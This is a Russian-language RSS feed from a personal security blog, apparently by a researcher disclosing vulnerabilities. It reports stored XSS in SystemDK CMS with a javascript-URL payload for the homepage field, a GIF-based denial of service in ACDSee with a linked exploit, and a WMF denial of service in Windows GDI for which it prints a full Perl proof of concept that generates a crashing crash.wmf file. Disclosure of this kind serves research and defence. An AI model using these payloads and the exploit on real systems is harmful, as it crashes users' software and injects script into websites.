<?xml version="1.0" encoding="windows-1251"?>

<rss version="2.0">
 <channel>
	<title>Отказ в обслуживаний</title>
	<guid>http://www.securitylab.ru/blog/personal/DoS_in_WMF/</guid>
	<link>http://www.securitylab.ru/blog/personal/DoS_in_WMF/</link>
	<description></description>
	<language>ru</language>
	<docs>http://backend.userland.com/rss2</docs>
	<pubDate>Thu, 11 Mar 2010 20:38:59 +0300</pubDate>

    <item>
      <title>Множественные XSS в SystemDK CMS</title>
      <description><![CDATA[                         Обнаружил вот такие косячки за SystemDK CMS.<br />Активные XSS:<br /><br />1. <a href='http://www.systemdk.ru/dkmodules.php?name=Files&dkgo=add_file' target='_blank'>http://www.systemdk.ru/dkmodules.php?...o=add_file</a> <br /><br />Активная XSS почти во всех полях: Заголовок, Описание, Имя автора, Емайл автора, Домашняя страница, Ссылка на файл. Самое удобное для внедрения скрипта поле &quot;Домашняя страница&quot;.<img src="http://www.securitylab.ru/bitrix/images/blog/smile/icon_smile.gif" border="0" alt="" />)<br /><br />http://&quot;style=&quot;background:url(javascript:alert(1))/** <br /><br />[URL=http://www.securityblogs.ru/index.php?act=1&id=1]Подроб<WBR>нее&gt;&gt;[/URL                         <br /><a href="http://www.securitylab.ru/blog/personal/DoS_in_WMF/3775.php">Подробнее...</a>]]></description>
      <link>http://www.securitylab.ru/blog/personal/DoS_in_WMF/3775.php</link>
      <guid>http://www.securitylab.ru/blog/personal/DoS_in_WMF/3775.php</guid>
      <pubDate>Sat, 05 Jan 2008 00:10:32 +0300</pubDate>
    </item>

    <item>
      <title>Отказ в обслуживании при обработке GIF в ACDSee</title>
      <description><![CDATA[                          Удаленный пользователь может с помощью специально сформированного GIF изображения вызвать отказ в обслуживании ACDSee Viewer. Уязвимость существует из-за ошибки при обработке элемента Block Size структуры GIF Graphic Control Extension Block. Уязвима версия ACDSee 8.2.1 и более ранние.<br />   Размер блока - Block Size в корректном gif-файле всегда равняется 4 и для меня остаётся загадкой, почему программисты из компании ACD Systems решили брать это значение из GIF файла.<br />Эксплоит: <a href='http://www.securityblogs.ru/downloads/acdsee_dos_c.html' target='_blank'>acdsee_dos.c</a>                          <br /><a href="http://www.securitylab.ru/blog/personal/DoS_in_WMF/3765.php">Подробнее...</a>]]></description>
      <link>http://www.securitylab.ru/blog/personal/DoS_in_WMF/3765.php</link>
      <guid>http://www.securitylab.ru/blog/personal/DoS_in_WMF/3765.php</guid>
      <pubDate>Fri, 04 Jan 2008 00:19:58 +0300</pubDate>
    </item>

    <item>
      <title>Подробнее о баге тут:</title>
      <description><![CDATA[                         <a href='http://www.securityblogs.ru/index.php?act=1&id=4' target='_blank'>SecurityBlogs</a>                         <br /><a href="http://www.securitylab.ru/blog/personal/DoS_in_WMF/3415.php">Подробнее...</a>]]></description>
      <link>http://www.securitylab.ru/blog/personal/DoS_in_WMF/3415.php</link>
      <guid>http://www.securitylab.ru/blog/personal/DoS_in_WMF/3415.php</guid>
      <pubDate>Thu, 22 Nov 2007 06:37:12 +0300</pubDate>
    </item>

    <item>
      <title>Отказ в обслуживаний в WMF</title>
      <description><![CDATA[                         <span style="font-family:Verdana"><br />Удаленный пользователь может с помощью специально сформированного изображения вызвать отказ в обслуживании приложения, использующего уязвимую библиотеку.<br />  Это происходит при отображении ESCAPE-метазаписи (фунция STARTDOC)так как, не инициализированый адреса импорта функции SeekPrinter из winspool.drv.<br />  Уязвимыми оказываются не только приложения успользующие напрямую GDI, но и приложения использующие функции shimgvw.dll как &quot;высокоуровневой обёртки&quot; GDI, такие как &quot;Программа просмотра изображений и факсов&quot; и Windows Explorer.<br /> Способов устранения уязвимости не существует в настоящее время. <br /><br />Эксплоит:<br /><br />#!/usr/bin/perl<br /><br />print &quot;\nWMF PoC denial of service exploit by AzM&quot;;<br />print &quot;\n\ngenerating crash.wmf...&quot;;<br />open(WMF, &quot;&gt;./crash.wmf&quot;) or die &quot;cannot create wmf file\n&quot;;<br />print WMF &quot;\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x01\x00\x84\x43\x0<WBR>0\x00&quot;;<br />print WMF &quot;\x00\x00\x10\x00\x00\x00\x26\x06\x0A\x00\x16\x00\x90\x90\x9<WBR>0\x90&quot;;<br />print WMF &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9<WBR>0\x90&quot;;<br />print WMF &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x00\x0<WBR>3\x00&quot;;<br />print WMF &quot;\x00\x00\x00\x00&quot;;<br />close(WMF);<br />print &quot;Ok\n&quot;;<br /></span>                         <br /><a href="http://www.securitylab.ru/blog/personal/DoS_in_WMF/681.php">Подробнее...</a>]]></description>
      <link>http://www.securitylab.ru/blog/personal/DoS_in_WMF/681.php</link>
      <guid>http://www.securitylab.ru/blog/personal/DoS_in_WMF/681.php</guid>
      <pubDate>Thu, 22 Feb 2007 09:04:30 +0300</pubDate>
    </item>

  </channel>
</rss>